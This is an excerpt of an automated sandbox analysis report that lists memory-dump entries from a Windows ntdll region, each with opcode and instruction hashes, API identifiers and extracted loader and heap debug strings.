                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecf4908c6c01cf5a2557aba0ca115d2e93cac750a289332c365cfc0dfd1e67a4
                                                • Instruction ID: aff90224d0d71e6703d0440d0eae04837ecf2532505feb06e5fb310e8a7aec0e
                                                • Opcode Fuzzy Hash: ecf4908c6c01cf5a2557aba0ca115d2e93cac750a289332c365cfc0dfd1e67a4
                                                • Instruction Fuzzy Hash: 749002A1241540924A00B2588804F0A450547E0201B55C017E2065734CC92589559935
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5287a35dfefa31f7013dfdbf043c3212ef8e27d43009d53cccbdbfbfedf1d8b9
                                                • Instruction ID: 8dd18b56a92ce8cdd68bedc667916946441461661e43ed7b0077f61875ac24c2
                                                • Opcode Fuzzy Hash: 5287a35dfefa31f7013dfdbf043c3212ef8e27d43009d53cccbdbfbfedf1d8b9
                                                • Instruction Fuzzy Hash: 8890023124140802D68071584804A4A000547D1301F95C016A1036728DCE158B5D7FA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 700439a90301adc7f3dedfa28e5329e7ba6158d8f4e24d5e70e5bbc290e9977d
                                                • Instruction ID: 773cc8e829c4dc077bef487f6481b9d657d7c22256753a960d7614ce4508a2df
                                                • Opcode Fuzzy Hash: 700439a90301adc7f3dedfa28e5329e7ba6158d8f4e24d5e70e5bbc290e9977d
                                                • Instruction Fuzzy Hash: 5B90023124544842D64071584804E46001547D0305F55C012A1075768D9A258E59BE61
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1118fdcaead04a63b6728c199fa9e41a85553f05fe1fc57c7de5f02586d83b05
                                                • Instruction ID: 124a7b86730694f7d2b56d9372cde1f3c48e3e47f67d5814a3ac322a188290a7
                                                • Opcode Fuzzy Hash: 1118fdcaead04a63b6728c199fa9e41a85553f05fe1fc57c7de5f02586d83b05
                                                • Instruction Fuzzy Hash: 7490023124140802D60471584C04A86000547D0301F55C012A7035729E9A6589957931
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 452be0b534bcefee265fe72c566c19e795a8ac98bb132d1ae6306536dbb1b1e8
                                                • Instruction ID: fb46e758178071173318f9e9498c938c0993bbc6e5748c17c98fdfe747e2bc25
                                                • Opcode Fuzzy Hash: 452be0b534bcefee265fe72c566c19e795a8ac98bb132d1ae6306536dbb1b1e8
                                                • Instruction Fuzzy Hash: 8D90023164540802D65071584814B46000547D0301F55C012A1035728D8B558B597EA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2bc5360544755f81f16d78fe4f2cd92f07c4e03f0aae5983a600896b50602e44
                                                • Instruction ID: c438c6bb81acfd7ebb68c675f091ed2701fd91019f88f94e5b2169af76806f0a
                                                • Opcode Fuzzy Hash: 2bc5360544755f81f16d78fe4f2cd92f07c4e03f0aae5983a600896b50602e44
                                                • Instruction Fuzzy Hash: ED90026124240003460571584814A16400A47E0201B55C022E2025764DC92589956925
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: c02b29ee58435a18e8e1a9ad96ff6420740d68f698a3105e8d5f519372309a82
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:

                                                Control-flow Graph (graph image omitted)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 1a682abf9227eda770279e6943ba48fac12b9d1943453597e9c39ea92c277f88
                                                • Instruction ID: b50ebef037316f869c9c263666cf77de37664aba32527dfa014a975d327ac7c1
                                                • Opcode Fuzzy Hash: 1a682abf9227eda770279e6943ba48fac12b9d1943453597e9c39ea92c277f88
                                                • Instruction Fuzzy Hash: FB51E8B6E08316BEEB10DF6ACD8057EF7B8BB082407588269E494D7641D774DE10CBE1

                                                Control-flow Graph (graph image omitted)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 185af4dffad9be9bfa0fc608220f16e2231c4a9784e3688edb54ee92229dfd5c
                                                • Instruction ID: 6e56cd5f0dc05934073012509a40231711ec51f77047059759b6a615a2efab39
                                                • Opcode Fuzzy Hash: 185af4dffad9be9bfa0fc608220f16e2231c4a9784e3688edb54ee92229dfd5c
                                                • Instruction Fuzzy Hash: A0516974E00645AFEB24CF9CCC8087FBBF8EF44244B508459E496C3A45EB74DA88EB65

                                                Control-flow Graph (graph image omitted)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP:
                                                • API String ID: 3446177414-2466845122
                                                • Opcode ID: 7898d4efcf01875933a2088cbd09fcc9733f7aec13d05cfa8532aca80db245ac
                                                • Instruction ID: 3eb31c9cf5cec3fa5af0e043156638c1d40d531b8510b6aa6e2d93ba3210e53a
                                                • Opcode Fuzzy Hash: 7898d4efcf01875933a2088cbd09fcc9733f7aec13d05cfa8532aca80db245ac
                                                • Instruction Fuzzy Hash: 3DA1EE75A063518FE704CF28C894A1AB7E6FF88354F25452DE945DB350EBB0EC8ACB91

                                                Control-flow Graph (graph image omitted)
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36DD46FC
                                                • Execute=1, xrefs: 36DD4713
                                                • ExecuteOptions, xrefs: 36DD46A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 36DD4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36DD4725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36DD4742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36DD4655
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: b0f995d00085b579fb49f5f15237850cd559a116822ac5515ee61d729927518b
                                                • Instruction ID: 02829c9a37efa48fe78915aa93415c088ae81be188fdb3989418e2b3243164ee
                                                • Opcode Fuzzy Hash: b0f995d00085b579fb49f5f15237850cd559a116822ac5515ee61d729927518b
                                                • Instruction Fuzzy Hash: 37510675A00219BAEB11ABA5DC89BEA77F8EF44344F5400A9D604AB180EB709E45CFA1
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC79FA
                                                • Actx , xrefs: 36DC7A0C, 36DC7A73
                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36DC7AE6
                                                • SsHd, xrefs: 36D7A3E4
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC79D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DC79D0, 36DC79F5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-1988757188
                                                • Opcode ID: be7d0a069a2ee35bda63fba4df762cba0070c0e46de7bb43a4d40c3690d591b5
                                                • Instruction ID: 483870cbc875ed63071a5a7fa597540f5ae82ff35c60b06fb31b74f7943b54fd
                                                • Opcode Fuzzy Hash: be7d0a069a2ee35bda63fba4df762cba0070c0e46de7bb43a4d40c3690d591b5
                                                • Instruction Fuzzy Hash: EAE1E6B5A047028FE714CF25C884B5A77E1BF88358F584A2DF899CB290DB72D945CB93
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC936B
                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36DC9565
                                                • GsHd, xrefs: 36D7D874
                                                • Actx , xrefs: 36DC9508
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC9346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DC9341, 36DC9366
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-2196497285
                                                • Opcode ID: 093403af15f7fc8596b51a12cf486efe89661016b35c234bc99787c338f45d70
                                                • Instruction ID: 72c9633a602b9a6dc0649898f7eaaeddce3b2c5c304ec4213127f895ca75b329
                                                • Opcode Fuzzy Hash: 093403af15f7fc8596b51a12cf486efe89661016b35c234bc99787c338f45d70
                                                • Instruction Fuzzy Hash: FEE1DF74A08346CFE710CF25C890B5AB7F4BF88358F544A2DE8968B285D771E948CB93
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 36D5656C
                                                  • Part of subcall function 36D565B5: RtlDebugPrintTimes.NTDLL ref: 36D56664
                                                  • Part of subcall function 36D565B5: RtlDebugPrintTimes.NTDLL ref: 36D566AF
                                                Strings
                                                • LdrpInitShimEngine, xrefs: 36DB99F4, 36DB9A07, 36DB9A30
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36DB99ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36DB9A2A
                                                • apphelp.dll, xrefs: 36D56496
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36DB9A01
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DB9A11, 36DB9A3A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-204845295
                                                • Opcode ID: 831122c7ebc7e726be3c4b8408dcd441d4949c33f5d281f4ac9eae4a447de710
                                                • Instruction ID: 9c5b5c3a7a52179dc9097b2078dcf0873a8e04f7fc6700621be2a7f5ad2768f1
                                                • Opcode Fuzzy Hash: 831122c7ebc7e726be3c4b8408dcd441d4949c33f5d281f4ac9eae4a447de710
                                                • Instruction Fuzzy Hash: 9E51A071A08384AFEB15DF20C841E5B7BE5AF85644F410919F686AB1A4DB30D908CFA3
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                • API String ID: 3446177414-4227709934
                                                • Opcode ID: 3ca5c748822ef97e8b4f7e878059fef1a3174926bef2292f27da924a6809aab8
                                                • Instruction ID: d5da898533b377e65cb42c6f0fe297173d390820c09e0d0f6ffa558545420372
                                                • Opcode Fuzzy Hash: 3ca5c748822ef97e8b4f7e878059fef1a3174926bef2292f27da924a6809aab8
                                                • Instruction Fuzzy Hash: 6B417CB9E01249ABDB01EF9AC990ADEBBB5FF88344F100119EA04AB341D731DD15CBA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                • API String ID: 3446177414-3492000579
                                                • Opcode ID: 1d92ff93613537d877f181fee2a90100432f4b3c7a2a215cb23fc9547cd34da3
                                                • Instruction ID: 2f6835eb406ac9285d19bc58e48f524fa77f9f277d300a5aed9cf260ca8ba171
                                                • Opcode Fuzzy Hash: 1d92ff93613537d877f181fee2a90100432f4b3c7a2a215cb23fc9547cd34da3
                                                • Instruction Fuzzy Hash: B6714575911644DFDB01CFAAC8406ADFBF2FF4A318F548059EA44AB642CB34D989CFA1
                                                APIs
                                                Strings
                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DB9AF6
                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DB9AB4
                                                • LdrpLoadShimEngine, xrefs: 36DB9ABB, 36DB9AFC
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DB9AC5, 36DB9B06
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-3589223738
                                                • Opcode ID: 6f16d566ab261bee53d5e08000c06390e5b01fb38fc8bbebfa6ebead12cbeb38
                                                • Instruction ID: b5bd217348274025758238eadd3ebe850db208a38eaf719902fa2628aca37f2f
                                                • Opcode Fuzzy Hash: 6f16d566ab261bee53d5e08000c06390e5b01fb38fc8bbebfa6ebead12cbeb38
                                                • Instruction Fuzzy Hash: C5513176A113989FDF08DB68CC98E9D7BB2AB40304F010155E751BF2A5DB70EC59CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: @36$LdrpUnloadNode$Unmapping DLL "%wZ"$df6@36@36$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-1025258580
                                                • Opcode ID: 5effc9fc8288e300b14ae4135a6e1fdd775eec08450ca7de69b7d82a7c9098f5
                                                • Instruction ID: fe7bf1a2e932d21a3542ef21211c4aaedb680aff337bc7f0ebb88b0db3d37aae
                                                • Opcode Fuzzy Hash: 5effc9fc8288e300b14ae4135a6e1fdd775eec08450ca7de69b7d82a7c9098f5
                                                • Instruction Fuzzy Hash: 3251E471A007029FE714EF39CC88B29BBA1BF84214F14066DE5D69F694DB74E845CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-3224558752
                                                • Opcode ID: f7247bfd412933f672558346c3e9b1b60f63e2d66646b3ddf2407ce9a2411fac
                                                • Instruction ID: ebc341117268c201ed69e510f1a8cffa542aae58d7053ce19d9887d928792c64
                                                • Opcode Fuzzy Hash: f7247bfd412933f672558346c3e9b1b60f63e2d66646b3ddf2407ce9a2411fac
                                                • Instruction Fuzzy Hash: 364116B6A11B44EFE701CF25C898B9AB7B4EF01364F208169E5455B694CB38E884CBD1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-1222099010
                                                • Opcode ID: ebe7653a1cd8c2156a4ea31c62bbdc4ec25107e37d8b70b5c4182e19e57163c9
                                                • Instruction ID: 014798218f09964e6ea1864fda1a4328e996e2057884af4ac935d82b339f9ca2
                                                • Opcode Fuzzy Hash: ebe7653a1cd8c2156a4ea31c62bbdc4ec25107e37d8b70b5c4182e19e57163c9
                                                • Instruction Fuzzy Hash: 8E317B36915788EFE712CB24C90CB897BF4EF02754F104094E4414BAD6CBB8E888CF62
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: 7b2dcaaa0d0f9795830784c17461adb3274418af0b32dbf0ec51eb5af3795000
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: C50235B5509341AFD744CF29C890A6BBBE5EFC8704F60892DF9984B264DB31E909CB52
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
